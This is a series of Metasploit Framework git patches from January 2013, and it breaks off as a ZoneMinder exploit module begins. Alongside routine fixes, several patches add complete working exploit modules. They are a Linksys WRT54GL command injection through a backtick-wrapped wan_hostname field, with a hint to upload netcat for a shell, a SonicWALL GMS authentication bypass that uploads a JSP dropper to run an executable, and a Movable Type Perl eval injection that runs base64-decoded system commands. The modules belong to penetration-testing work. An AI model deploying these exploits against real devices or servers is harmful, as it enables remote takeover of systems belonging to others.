b2c722310893aa1a9a858a42fafde51dc9548f98 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 21 Jan 2013 12:26:35 +0100 Subject: [PATCH 087/421] Cleanup for mysql_file_enum.rb --- lib/msf/core/exploit/mysql.rb | 7 --- .../scanner/mysql/mysql_file_enum.rb | 62 ++++++++++++++----- 2 files changed, 45 insertions(+), 24 deletions(-) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 86ed7e856a06..b86e51e9a955 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -87,13 +87,6 @@ def mysql_login_datastore return res end - # This function does not handle any errors, if you use this - # make sure you handle the errors yourself - def mysql_query_no_handle(sql) - res = @mysql_handle.query(sql) - res - end - def mysql_query(sql) begin res = @mysql_handle.query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index d7b30b5da6fb..09374fc9d1dc 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -18,27 +18,39 @@ def initialize super( 'Name' => 'MYSQL File/Directory Enumerator', 'Description' => %Q{ - Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. + Enumerate files and directories using the MySQL load_file feature, for more + information see the URL in the references. }, 'Author' => [ 'Robin Wood ' ], 'References' => [ - [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], - [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] - ], + [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], + [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] + ], 'License' => MSF_LICENSE ) register_options([ OptPath.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), - OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), + OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'mysql' ]), OptString.new('TABLE_NAME', [ true, "Name of table to use - Warning, if the table already exists its contents will be corrupted", Rex::Text.rand_text_alpha(8) ]), OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) - ]) + ]) end + # This function does not handle any errors, if you use this + # make sure you handle the errors yourself + def mysql_query_no_handle(sql) + res = @mysql_handle.query(sql) + res + end + + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) - print_status("Checking " + ip) + vprint_status("#{peer} - Login...") if (not mysql_login_datastore) return @@ -47,10 +59,10 @@ def run_host(ip) begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - print_error("MySQL Error: #{e.class} #{e.to_s}") + vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - print_error("Timeout: #{e.message}") + vprint_error("#{peer} - Timeout: #{e.message}") return end @@ -58,7 +70,7 @@ def run_host(ip) table_exists = (res.size == 1) if !table_exists - print_status("Table doesn't exist so creating it") + vprint_status("#{peer} - Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -66,9 +78,10 @@ def run_host(ip) file.each_line do |line| check_dir(line.chomp) end + file.close if !table_exists - print_status("Cleaning up the temp table") + vprint_status("#{peer} - Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end @@ -77,19 +90,34 @@ def check_dir dir begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good(dir + " is a directory and exists") + print_good("#{peer} - #{dir} is a directory and exists") + report_note( + :host => rhost, + :type => "filesystem.dir", + :data => "#{dir} is a directory and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) rescue ::RbMysql::ServerError - print_warning(dir + " does not exist") + vprint_warning("#{peer} - #{dir} does not exist") rescue ::RbMysql::Error => e - print_error("MySQL Error: #{e.class} #{e.to_s}") + vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - print_error("Timeout: #{e.message}") + vprint_error("#{peer} - Timeout: #{e.message}") return else - print_good(dir + " is a file and exists") + print_good("#{peer} - #{dir} is a file and exists") + report_note( + :host => rhost, + :type => "filesystem.file", + :data => "#{dir} is a file and exists", + :port => rport, + :proto => 'tcp', + :update => :unique_data + ) end - #puts res.inspect return end From 62ff52280a478026b0d832a69c39cbcfc38f65f1 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 21 Jan 2013 13:19:29 +0100 Subject: [PATCH 088/421] initial linksys OS command injection --- .../admin/http/linksys_wrt54gl_exec.rb | 144 ++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb new file mode 100644 index 000000000000..e9f525b7ec80 --- /dev/null +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -0,0 +1,144 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linksys WRT54GL Remote Command Execution', + 'Description' => %q{ + Some Linksys Routers are vulnerable to OS Command injection. + You will need credentials to the webinterface to access the vulnerable part + of the application. + Default credentials are always a good starting point. admin/admin or admin + and blank password could be a first try. + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your + local system for a first test. + + Hint: To get a remote shell you could upload a netcat binary and exec it. + WARNING: Backup your network and dhcp configuration. We will overwrite it! + Have phun + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'EDB', '24202' ], + [ 'BID', '57459' ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 18 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USER',[ true, 'User to login with', 'admin']), + OptString.new('PASS',[ true, 'Password to login with', 'password']), + OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), + OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), + OptString.new('LANIP', [ false, 'LAN IP address of the router', '']), + OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), + OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), + ], self.class) + end + + def run + #setting up the needed variables + uri = datastore['VULNPATH'] + user = datastore['USER'] + rhost = datastore['RHOST'] + netmask = datastore['NETMASK'] + routername = datastore['ROUTER_NAME'] + wandomain = datastore['WAN_DOMAIN'] + wanmtu = datastore['WAN_MTU'] + + # using the RHOST for the correct lan IP settings + # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! + if datastore['LANIP'] =~ // + ip = datastore['LANIP'].split('.') + else + ip = rhost.split('.') + end + + # not sure if this is a good way for blank passwords: + if datastore['PASS'] == "" + pass = "" + else + pass = datastore['PASS'] + end + + print_status("Trying to login with #{user} / #{pass}") + + user_pass = Rex::Text.encode_base64(user + ":" + pass) + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } + }, 25) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + + print_status("Sending remote command: " + datastore['CMD']) + + cmd = Rex::Text.uri_encode(datastore['CMD']) + #cmd = datastore['CMD'] + + data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + + if datastore['VERBOSE'] == true + print_line("using the following target URL: \n#{uri}") + end + + begin + res = send_request_cgi( + { + 'uri' => uri, + 'method' => 'POST', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + }, + 'data' => data_cmd, + }, 20) + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n") + print_status("Blind Exploitation - unknown Exploitation state\n") + end +end From 11c13500bed711f3d1e8e09aaa202e8799e3edb0 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 21 Jan 2013 13:41:42 +0100 Subject: [PATCH 089/421] small fix --- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index e9f525b7ec80..85d8c93afa3c 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -67,7 +67,7 @@ def run # using the RHOST for the correct lan IP settings # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! - if datastore['LANIP'] =~ // + if datastore['LANIP'] !~ // ip = datastore['LANIP'].split('.') else ip = rhost.split('.') From eb92070df8f7068edbe4759b7d69cf3966dc7ff1 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 22 Jan 2013 01:54:41 +0100 Subject: [PATCH 090/421] added module for CVE-2013-1359 --- .../multi/http/sonicwall_gms_upload.rb | 273 ++++++++++++++++++ 1 file changed, 273 insertions(+) create mode 100644 modules/exploits/multi/http/sonicwall_gms_upload.rb diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb new file mode 100644 index 000000000000..5e710b117d32 --- /dev/null +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -0,0 +1,273 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SonicWALL GMS Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in SonicWALL GMS. It exploits two + vulnerabilities in order to get its objective. An authentication bypass in the + Web Administration interface allows to abuse the "appliance" application and upload + an arbitrary payload embedded in a JSP. The module has been tested successfully on + SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual + Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run + successfully while testing, shell payload have been used. + }, + 'Author' => + [ + 'Nikolas Sotiriu', # Vulnerability Discovery + 'Julian Vilas ', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1359'], + [ 'OSVDB', '89347' ], + [ 'BID', '57445' ], + [ 'EDB', '24204' ] + ], + 'Privileged' => true, + 'Platform' => [ 'win', 'linux' ], + 'Targets' => + [ + [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 17 2012')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) + ], self.class) + end + + def generate_jsp + var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) + var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) + var_data = Rex::Text.rand_text_alpha(rand(8)+8) + var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_counter = Rex::Text.rand_text_alpha(rand(8)+8) + var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) + var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) + var_comb = Rex::Text.rand_text_alpha(rand(8)+8) + var_exe = Rex::Text.rand_text_alpha(rand(8)+8) + @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) + var_proc = Rex::Text.rand_text_alpha(rand(8)+8) + var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) + var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) + + jspraw = "<%@ page import=\"java.io.*\" %>\n" + jspraw << "<%\n" + jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" + jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" + jspraw << "String #{var_data} = \"\";\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" + jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" + jspraw << "}\n" + + jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" + jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" + + jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" + jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" + jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" + jspraw << "#{var_inputstream}.close();\n" + + jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" + jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" + jspraw << "{\n" + jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" + jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" + jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" + jspraw << "#{var_comb} <<= 4;\n" + jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" + jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" + jspraw << "}\n" + + jspraw << "#{var_outputstream}.write(#{var_bytes});\n" + jspraw << "#{var_outputstream}.close();\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" + jspraw << "String[] #{var_fperm} = new String[3];\n" + jspraw << "#{var_fperm}[0] = \"chmod\";\n" + jspraw << "#{var_fperm}[1] = \"+x\";\n" + jspraw << "#{var_fperm}[2] = #{var_exepath};\n" + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" + jspraw << "if (#{var_proc}.waitFor() == 0) {\n" + jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + # Linux and other UNICES allow removing files while they are in use... + jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" + jspraw << "} else {\n" + # Windows does not .. + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + + jspraw << "%>\n" + return jspraw + end + + def get_install_path + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'connection' => 'TE, close', + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'vars_post' => { + 'num' => '123456', + 'action' => 'show_diagnostics', + 'task' => 'search', + 'item' => 'application_log', + 'criteria' => '*.*', + 'width' => '500' + } + }) + + if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ + return $1 + end + + return nil + end + + def upload_file(location, filename, contents) + post_data = Rex::MIME::Message.new + post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") + post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") + post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") + post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") + + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'connection' => 'TE, close' + }) + + if res and res.code == 200 and res.body.empty? + return true + else + return false + end + end + + def check + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + if get_install_path.nil? + return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Vulnerable + end + + def exploit + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + # Get Tomcat installation path + print_status("#{@peer} - Retrieving Tomcat installation path...") + install_path = get_install_path + + if install_path.nil? + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") + end + + print_good("#{@peer} - Tomcat installed on #{install_path}") + + if target['Platform'] == "linux" + @location = "#{install_path}webapps/appliance/" + elsif target['Platform'] == "win" + @location = "#{install_path}webapps\\appliance\\" + end + + + # Upload the JSP and the raw payload + @jsp_name = rand_text_alphanumeric(8+rand(8)) + + jspraw = generate_jsp + + # Specify the payload in hex as an extra file.. + payload_hex = payload.encoded_exe.unpack('H*')[0] + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) + print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") + end + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@jsp_name}.jsp", jspraw) + print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") + end + + print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'method' => 'GET' + }) + + if res and res.code != 200 + print_warning("#{@peer} - Error triggering the payload") + end + + register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") + register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + end + +end From d6ed6cd5e45cb17698fbaa0c1c177b72583893b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 22 Jan 2013 00:27:03 -0600 Subject: [PATCH 091/421] Fix a stack overflow in bidirectional pipe --- lib/rex/io/bidirectional_pipe.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/rex/io/bidirectional_pipe.rb b/lib/rex/io/bidirectional_pipe.rb index c79ed2771501..d1de67ffcf5c 100644 --- a/lib/rex/io/bidirectional_pipe.rb +++ b/lib/rex/io/bidirectional_pipe.rb @@ -99,7 +99,7 @@ def print_status(msg='') end def print_warning(msg='') - print_warning('[!] ' + msg) + print_line('[!] ' + msg) end # @@ -159,4 +159,3 @@ def pgets end end - From 4740cb09a168219894672a8fae0a532fcbf73b1f Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Tue, 22 Jan 2013 02:56:43 -0500 Subject: [PATCH 092/421] Fix NoMethodError if handler has no ParentModule db.rb assumes that multi/handler sessions have a ParentModule defined in their datastore. This assumption breaks when a user sets up a multi/handler by hand to receive a session from another user (e.g., via multi_meter_inject). When db.rb tries to access a member of a nil ParentModule, a stacktrace is dumped to framework.log. --- lib/msf/core/db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index a8cfe5543112..7e0bc736bae5 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -679,8 +679,8 @@ def report_session(opts) # In the case of multi handler we cannot yet determine the true # exploit responsible. But we can at least show the parent versus # just the generic handler: - if session and session.via_exploit == "exploit/multi/handler" - sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] + if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + sess_data[:via_exploit] = sess_data[:datastore]['ParentModule'] end s = ::Mdm::Session.new(sess_data) @@ -696,9 +696,9 @@ def report_session(opts) mod = framework.modules.create(session.via_exploit) - if session.via_exploit == "exploit/multi/handler" - mod_fullname = sess_data[:datastore]['ParentModule'] - mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] + mod_fullname = sess_data[:datastore]['ParentModule'] + mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name else mod_name = mod.name mod_fullname = mod.fullname @@ -720,7 +720,7 @@ def report_session(opts) vuln = framework.db.report_vuln(vuln_info) - if session.via_exploit == "exploit/multi/handler" + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else via_exploit = session.via_exploit From 08062597b9cb4ff1b39d755a5f4410363becbbac Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 22 Jan 2013 12:07:16 +0100 Subject: [PATCH 093/421] fix data added to table --- modules/post/windows/gather/credentials/filezilla_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 66da9f2113a0..619b80190e49 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -168,7 +168,7 @@ def get_filezilla_creds(paths) perms.each do |perm| permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'], - perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate']] + perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate'], perm['home']] end vprint_status(" Collected the following configuration details:") From cd29a88c18482300d06eec75c588ac7aaf0a8f45 Mon Sep 17 00:00:00 2001 From: Kacper Nowak Date: Tue, 22 Jan 2013 11:58:24 +0000 Subject: [PATCH 094/421] added Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution --- .../multi/http/movabletype_upgrade_exec.rb | 126 ++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 modules/exploits/multi/http/movabletype_upgrade_exec.rb diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb new file mode 100644 index 000000000000..1ede21300889 --- /dev/null +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +### +# +# The vulnerability arises due to the following properties: +# +# 1: This script may be invoked remotely without requiring authentication to any MT +# instance. +# +# 2: Through a crafted POST request, it is possible to invoke particular +# database migration functions (i.e functions that bring the existing database +# up-to-date with an updated codebase) by name and with particular parameters. +# +# 3: A particular migration function, core_drop_meta_for_table, allows a class +# parameter to be set which is used directly in a perl eval statement, allowing +# perl code injection. +# +### + +class Metasploit4 < Msf::Exploit::Remote + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on MoveableType (MT) + thatexposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + that is used during installation and updating of the platform. + }, + 'Author' => + [ + 'Kacper Nowak', + 'Nick Blundell', + "Gary O'Leary-Steele", + ], + 'References' => + [ + ['CVE', '2012-6315'], + ['URL', 'http://www.sec-1.com/blog/?p=402'], + ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => + [ + 'win', + 'unix' + ], + 'Targets' => + [ + ['Movable Type 4.2x, 4.3x', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 08 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('RPATH', [true, 'The URI path of the Movable Type installation', '/mt']) + ], self.class) + end + + def check + @peer = "#{rhost}:#{rport}" + fingerprint = rand_text_alpha(5) + print_status("#{@peer} - Sending check...") + begin + res = http_send_raw(fingerprint) + rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout + return + end + if (res) + if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) + return Exploit::CheckCode::Vulnerable + elsif (res.code != 200) + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + print_status("#{@peer} - Sending payload...") + http_send_cmd(payload.encoded) + end + + def http_send_raw(cmd, timeout=20) + path = normalize_uri(datastore['RPATH']) + '/mt-upgrade.cgi' + send_request_cgi( + { + 'uri' => path, + 'method' => 'POST', + 'vars_post' => + { + '__mode' => 'run_actions', + 'installing' => '1', + 'steps' => %{[["core_drop_meta_for_table","class","#{cmd.gsub('"', '\"')}"]]} + } + }, timeout) + end + + def http_send_cmd(cmd) + print_status(cmd) + pay = 'v0;use MIME::Base64;system(decode_base64(q(' + pay << Rex::Text.encode_base64(cmd) + pay << ')));return 0' + print_status(pay) + http_send_raw(pay, 0.5) + end +end From 08a5f467b18524efc4cd259cb2ec796bee703881 Mon Sep 17 00:00:00 2001 From: Kacper Nowak Date: Tue, 22 Jan 2013 12:14:38 +0000 Subject: [PATCH 095/421] added URL for developer site --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 1ede21300889..a6fc2c99cc6e 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -46,6 +46,7 @@ def initialize(info = {}) [ ['CVE', '2012-6315'], ['URL', 'http://www.sec-1.com/blog/?p=402'], + ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] ], 'Arch' => ARCH_CMD, 'Payload' => From 970591a85ff1fded9af62b3667e6d3079226f340 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 22 Jan 2013 22:56:50 +1030 Subject: [PATCH 096/421] Add ZoneMinder arbitrary command execution exploit --- .../webapp/zoneminder_packagecontrol_exec.rb | 148 ++++++++++++++++++ 1 file changed, 148 insertions(+) create mode 100644 modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb new file mode 100644 index 000000000000..c405327ab0f6 --- /dev/null +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -0,0 +1,148 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ZoneMinder Video Server packageControl Command Execution', + 'Description' => %q{ + This module exploits a command execution vulnerability in ZoneMinder Video + Server version 1.24.0 to 1.25.0 which could be abused to allow + authenticated users to execute arbitrary commands under the context of the + web server user. The 'packageControl' function in the + 'includes/actions.php' file calls 